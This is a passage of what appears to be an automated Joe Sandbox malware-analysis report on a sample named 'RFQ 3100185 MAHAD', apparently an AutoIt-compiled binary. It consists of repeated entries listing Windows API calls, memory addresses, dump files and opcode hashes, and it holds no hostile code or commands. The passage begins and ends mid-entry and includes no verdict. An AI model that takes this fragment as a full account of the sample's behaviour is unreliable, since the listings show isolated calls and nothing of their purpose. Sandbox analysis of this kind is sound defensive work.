                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: a6d0da6d572a3e1f2e82870e335f32878dc213c3ee3ab43763a785d0bc7cb446
                                                            • Instruction ID: 5c681d977d1603be1da198b1104cee37e8ca4de8b94793377fd6c53e58b0e5e7
                                                            • Opcode Fuzzy Hash: a6d0da6d572a3e1f2e82870e335f32878dc213c3ee3ab43763a785d0bc7cb446
                                                            • Instruction Fuzzy Hash: A8617E75A00219EFCB14DF98C985EFEB7F5AF08310F154069F656AB3A1DB78AE408B50
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 007CBCDA
                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 007CBCF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                            • Instruction ID: 14214436c9accaeb7aca97f5f44e7e3da2719233c00c04dcc21d77baa520256a
                                                            • Opcode Fuzzy Hash: 98ff80ddf9fe4064c5788b54a88460d26cc48cd2fcacf3a4fdd5624bc0c7682f
                                                            • Instruction Fuzzy Hash: 16513571408744DBE320AF14EC8AFAFBBE8FB94354F41484EF1C8410A2EF7495A98766
                                                            APIs
                                                              • Part of subcall function 007B44ED: __fread_nolock.LIBCMT ref: 007B450B
                                                            • _wcscmp.LIBCMT ref: 007FC65D
                                                            • _wcscmp.LIBCMT ref: 007FC670
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                            • Instruction ID: a9460cb195bea9302dd28f145c2dc50519da688d43158ad0f203ab12135ac7f5
                                                            • Opcode Fuzzy Hash: e80a1ed3e96aefdf9fe95856c19b4fa49b6ad6f206104b6f3e33423fb9c119a6
                                                            • Instruction Fuzzy Hash: C441D472A0420EBBDF219BA4DC46FEF77B9EF49714F000069F605EB281D6789A14CB61
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0081A85A
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0081A86F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                            • Instruction ID: a5fe05fb61ebb197839f5a7a3404a9dd1a0a02be3ca6b309d5c32a962f05d5f3
                                                            • Opcode Fuzzy Hash: 87499bbc16cdf7093e8ec99d1bfd7689e2ee613452c17f177c573dff983cfbfe
                                                            • Instruction Fuzzy Hash: 3741E974A013099FDB54CF68D885BDA7BB9FF08704F14046AE909EB385D770A981CF91
                                                            APIs
                                                            • _memset.LIBCMT ref: 00805190
                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008051C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_memset
                                                            • String ID: |
                                                            • API String ID: 1413715105-2343686810
                                                            • Opcode ID: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                            • Instruction ID: b0f224ee0745e60fa93a55ac7e66025d1f822ab5713bafea1da0b98dfe50f9bf
                                                            • Opcode Fuzzy Hash: 4b008555a4d294b90a88aa4fde333f77468ff3de975d908565339e62eefa246b
                                                            • Instruction Fuzzy Hash: 59312A71C01119EBCF41EFA4CC89AEE7FB9FF18714F104015F915AA166DB35A906DBA0
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0081980E
                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0081984A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$DestroyMove
                                                            • String ID: static
                                                            • API String ID: 2139405536-2160076837
                                                            • Opcode ID: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                            • Instruction ID: 8d7086b70b22f3146f0734cdaec9432f920a5769db0741f68d41d6e6b193f88a
                                                            • Opcode Fuzzy Hash: f122b664b6cbbf0160bfc98126a7463fd2dbc2f26bf3fcf105c7393370b552d1
                                                            • Instruction Fuzzy Hash: D8318A71110604AEEB109F28CC95BFB73ADFF99764F008629F8A9C7190DA34AC81C7A0
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F51C6
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F5201
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: cbb25aed41290cb5c7e119a89cc2953dc563a0422019b273e19a116859acac24
                                                            • Instruction ID: 1c44d58eb836fe90a6284950c9eb8fbefea6790120fc383fad32c02b3dee367d
                                                            • Opcode Fuzzy Hash: cbb25aed41290cb5c7e119a89cc2953dc563a0422019b273e19a116859acac24
                                                            • Instruction Fuzzy Hash: 8631C37160070CDBEB24CF99D849BBEBBB5FF45350F144119EB85A62A0D7789A44CB50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf
                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                            • API String ID: 2391506597-2584243854
                                                            • Opcode ID: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                            • Instruction ID: fd73c001a937e461c19d080a2b01f0c328b408f0314aed94e64f3b5c54a9c52f
                                                            • Opcode Fuzzy Hash: 0259b821a2a8fab9dc44e7dc80682c7379cf069a8922943fa247b096196d603a
                                                            • Instruction Fuzzy Hash: 4D218971600218EBCF10EFA4CC86BEE73B4FF59300F000459F015EB281EA39EA258BA1
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0081945C
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00819467
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                            • Instruction ID: 3c3309ec8c99a7b4d858e572fcd9cfd19c11980f2d390f01fad0ff80b12928a2
                                                            • Opcode Fuzzy Hash: 69c0c256ba01f51fd3953eb28f4c37c2b602e5a8722730aa3113ae0c9bc593e4
                                                            • Instruction Fuzzy Hash: 2A1190B1200208AFEF259E58DC90EEB376EFF983A4F110129F959D7290D6319C928764
                                                            APIs
                                                              • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                              • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                              • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                            • GetWindowRect.USER32(00000000,?), ref: 00819968
                                                            • GetSysColor.USER32(00000012), ref: 00819982
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                            • String ID: static
                                                            • API String ID: 1983116058-2160076837
                                                            • Opcode ID: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                            • Instruction ID: 8da967200e29dca75ea4d3cec1d8adda00cc73288bd42559b525bef36646a10c
                                                            • Opcode Fuzzy Hash: e6c050df152d34da3cec367f1afcbdba75a6b9626dd864d4e23ce5819980c7d7
                                                            • Instruction Fuzzy Hash: BF112972510209AFDB04DFB8CC45EEA7BA8FF48344F054629F996D3250E734E850DB60
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00819699
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008196A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                            • Instruction ID: fa17beda6926d17edcd214b21535a0fd42972e05b3fd301dfa81b431cb970ebd
                                                            • Opcode Fuzzy Hash: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                            • Instruction Fuzzy Hash: 8B115871500208AAEB109E68AC64EEB3B6EFF253A8F104714F9A9D71E0C735DC919760
                                                            APIs
                                                            • _memset.LIBCMT ref: 007F52D5
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007F52F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                            • Instruction ID: 1659d3b9efee780f59226176bb13ae072c8daf1992994d3957b923ef1b7dd812
                                                            • Opcode Fuzzy Hash: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                            • Instruction Fuzzy Hash: 4511D072A01628ABDB20DA9CD948BBD77B8BF05798F040125EB05E7394D3B4ED04C791
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00804DF5
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00804E1E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                            • Instruction ID: 24bc5c2f0b287d8971544d568c64221709e4254355f00aa8651fd6d4c311a400
                                                            • Opcode Fuzzy Hash: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                            • Instruction Fuzzy Hash: FE11C2B0541225FBDB658F51CC89EFBFBA8FF06764F10922AFA15D6180D3705954C6E0
                                                            APIs
                                                            • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                            • htons.WSOCK32(00000000,?,00000000), ref: 0080A88B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: htonsinet_addr
                                                            • String ID: 255.255.255.255
                                                            • API String ID: 3832099526-2422070025
                                                            • Opcode ID: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                            • Instruction ID: 412bbd13a0150421c4231f16f9b9ed7cb7186ff29ff3e264256945ab7ce6d69d
                                                            • Opcode Fuzzy Hash: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                            • Instruction Fuzzy Hash: 5B01D275200308ABCB199F68DC8AFADB364FF44314F10852AF516EB2D1DB75E8068752
                                                            APIs
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007EB7EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3850602802-1403004172
                                                            • Opcode ID: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                            • Instruction ID: 075660701f397453cdef9f1e7b3fc2a50071512ccb2570cc9d3efa03c754748e
                                                            • Opcode Fuzzy Hash: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                            • Instruction Fuzzy Hash: 3601B1B1642154EBCB05EBA4CC56AFF33A9BF4A350B04061DF472A72D2EB785D188B90
                                                            APIs
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 007EB6EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3850602802-1403004172
                                                            • Opcode ID: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                            • Instruction ID: eb96c948280d578ea793ac66b4857d8a0e5eb51067ba5f436f46dc4be0df904a
                                                            • Opcode Fuzzy Hash: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                            • Instruction Fuzzy Hash: 2801A7B1642144EBCB05EBA5C957FFF77B89F09344F100019B512B32C1DB589E1887B5
                                                            APIs
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 007EB76C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3850602802-1403004172
                                                            • Opcode ID: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                            • Instruction ID: 5d992c88eab948f0317267733fb93f6589ffd667521ab23700afac443178f10f
                                                            • Opcode Fuzzy Hash: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                            • Instruction Fuzzy Hash: 7701D6B5642154EBCB01E7A4C907FFF77AC9B49340F10401AB411B3292DB6C9E1987B5
                                                            APIs
                                                            • LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                            • EnumResourceNamesW.KERNEL32(00000000,0000000E,007F67E9,00000063,00000000,75A50280,?,?,007B3EE1,?,?,000000FF), ref: 008241B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: EnumImageLoadNamesResource
                                                            • String ID: >{
                                                            • API String ID: 1578290342-1646470997
                                                            • Opcode ID: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                            • Instruction ID: 4aac537566511449c83ee82ce81fdf50296566d7ec015b6329db55b15d595a71
                                                            • Opcode Fuzzy Hash: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                            • Instruction Fuzzy Hash: 52F06771650324B7EA205B1ABC4EFD23BADF754BB5F10051AF228AA5E0D2F4D0C08AA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
